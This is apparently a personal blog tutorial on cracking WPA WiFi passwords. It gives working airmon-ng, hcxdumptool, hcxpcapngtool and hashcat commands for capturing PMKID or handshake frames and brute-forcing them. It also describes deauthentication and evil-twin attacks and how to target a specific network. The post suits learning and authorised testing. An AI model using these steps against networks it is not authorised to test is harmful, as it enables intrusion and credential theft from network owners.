---
title: "Wpa_cracking"
date: 2024-11-18T12:12:48+05:30
---
# Wifi WPA password cracking

```
Disclaimer: This article is intended for educational purposes ONLY.
The information presented here is meant to serve as a hands-on exercise to
augment understanding of cybersecurity and ethical hacking principles put into
practice for lawful purposes.
```
After being jokingly called a "hacker" for using Arch Linux and working in the terminal, I decided to explore the world of ethical hacking and penetration testing seriously. 

While the journey is just beginning, I am documenting what I learn and sharing insights through my blog. This marks the start of a deeper dive into cybersecurity and the fascinating field of penetration testing.


First step : Check if your wifi card supports monitor mode or buy one which supports it.

## Kill potential interrupting services.

Before enabling monitor mode, identify and kill any services that might interrupt the process.
```bash
- sudo airmon-ng check wlan0
- sudo airmon-ng check kill
``` 
## Enable monitor mode.

Stop the WLAN interface and switch it to operate in monitor mode.
```bash
- sudo ifconfig wlan0 down
- sudo iwconfig wlan0 mode mon
- sudo ifconfig wlan0 up
``` 
or 

```bash
sudo airmon-ng start wlan0
```
Verify the WNIC is operating in monitor mode.
```
iwconfig
```




### Hash Extraction and Preparation for Cracking

Our initial step in the password cracking procedure involves installing **[Hashcat](https://hashcat.net/hashcat/)**, which is renowned as the world’s fastest and most advanced password recovery tool. The captured data from network sniffing is typically stored in the `pcapng` format. However, Hashcat requires the data to be in a hashfile format for processing. 

To address this, I utilized a tool from the powerful **[hcxtools](https://github.com/ZerBea/hcxtools)** suite. This toolset efficiently converts `pcapng` files into the hashfile format, ensuring compatibility with Hashcat and streamlining the cracking process.


### Methods for Capturing WiFi Handshakes in Password Cracking

To crack a WiFi password, it is essential to capture a live four-way handshake, a process that occurs during the establishment of a connection between a client and a router. This requires the attacker to monitor the network at the precise moment when the user or device connects to the WiFi network. Consequently, the attacker must be physically positioned within range of both the access point (router) and the client, relying on the user to enter the correct password and ensuring that all four packets of the handshake are successfully captured.

To expedite this process, an attacker can employ a deauthentication attack to force an already-connected user to disconnect and re-establish the connection. This approach eliminates the need to wait for a user to connect naturally, which may take an extended period (e.g., a home network user may not reconnect until returning from work). By de-authenticating the user, the attacker can induce the generation of a new four-way handshake, facilitating the capture process.

Another strategy involves the deployment of a malicious twin network, also known as an "evil twin," which mimics the legitimate network by broadcasting the same SSID (network name). This method aims to deceive users into attempting to connect to the fake network, thereby exposing their credentials. However, this technique has significant drawbacks: it is highly conspicuous, as the activity can generate detectable anomalies, and users may readily recognize and avoid the fraudulent network.



### PMKID-Based WiFi Password Cracking: Eliminating Real-Time Login Capture

Traditional WiFi password cracking methods rely on capturing a user's login process in real-time or waiting for users to connect to the network. However, leveraging the PMKID (Pairwise Master Key Identifier) attack eliminates these constraints. This approach removes the dependency on users actively connecting to the network and significantly simplifies the cracking process.

In this method, the attacker only needs to be within the vicinity of the router or network to capture a single PMKID frame. This frame is sufficient to attempt cracking the password without relying on a live four-way handshake. Furthermore, the PMKID approach inherently filters out incorrect passwords and malformed frames that could otherwise disrupt the cracking process.

Simply put, this technique does not require waiting for user activity on the network. Instead, the attacker passively obtains the PMKID hash and focuses on cracking it.

To effectively crack a PMKID, it is essential to first understand its generation process.

## Preparing the System for Hcxdumptool Execution

To ensure optimal performance and prevent interference during the execution of **[Hcxdumptool](https://github.com/ZerBea/hcxtools)**, it is recommended to disable services that could conflict with its operation. The following commands can be used to stop these services:

```bash
sudo systemctl stop wpa_supplicant && sudo systemctl stop NetworkManager
```
Then it is time to start sniffing.

```bash
sudo hcxdumptool -i wlan0 -w dumpfile.pcapng --rds=1 -F             
```
- -i my is my NIC, you can execute ifconfig to find your interface name.
- -w the output pcapng of the execution.
- -F is used to listen to all channels
- use -h to know more about hcxdumptool

## It’s cracking time!
Our first step in the cracking procedure is to install hashcat, the world’s fastest and most advanced password recovery tool. 
As the sniffing results are in the form of pcapng, we needed to convert them into a hashfile format to fit it to hashcat.
For this goal, I made use of another tool from the great suite of hcxtools.

```bash
hcxpcapngtool -o sed.txt dumpfile.pcapng
```
above makes a hashfile which can be used for cracking using hashcat
Resulting in a hashfile that each line takes on the following structure:

```
SIGNATURE*TYPE*PMKID/MIC*MACAP*MACSTA*ESSID* * *
``` 

Now for cracking passwords using hashcat and using gpu for parallel processing install cuda in your distribution.
and run hashcat

```bash
sudo bash -c "hashcat -m 22000 -a 3 -w4 -o cracked.txt --opencl-device-types 2 --status --status-timer=10 sed.txt ?d?d?d?d?d?d?d?d"

```
with increment flag:

```bash
sudo bash -c "hashcat -m 22000 -a 3 -w4 -o cracked.txt --opencl-device-types 2 --status --status-timer=10 --increment --increment-min=8 --increment-max=12 sed.txt ?d?d?d?d?d?d?d?d"
```

overview for commands used:

   - **`-m 22000`**:
     - Specifies the hash type. `22000` is used for WPA-PBKDF2-PMKID+EAPOL (a hash type related to Wi-Fi authentication).
   - **`-a 3`**:
     - Selects the attack mode. `3` is a brute-force attack mode.
   - **`-w4`**:
     - Sets the workload profile. `4` is the highest workload setting, utilizing maximum GPU resources for performance.
   - **`-o cracked.txt`**:
     - Specifies the output file (`cracked.txt`) where found passwords will be saved.
   - **`--opencl-device-types 2`**:
     - Limits the attack to only GPU devices (OpenCL device type `2` refers to GPUs).
   - **`--status`**:
     - Enables status output, showing progress periodically.
   - **`--status-timer=10`**:
     - Sets the interval for the status update to every 10 seconds.
   - **`sed.txt`**:
     - The input file containing the hash(es) to be cracked.
   - **`?d?d?d?d?d?d?d?d`**:
     - A mask specifying the brute-force pattern. 

the output of cracked passwords should be in cracked.txt in the same dir.


## Now how do I attack a specific Wifi address?

Just create a Berkeley Packet Filter and add it to hcxdumptool. from [github issue](https://github.com/ZerBea/hcxdumptool/discussions/348)
Note: card should be in Managed mode to scan networks.

## how to use with aircrack-ng
[useful guide with syntax errors](https://predatech.co.uk/capturing-and-cracking-wpa-wpa2-wifi-passwords/)





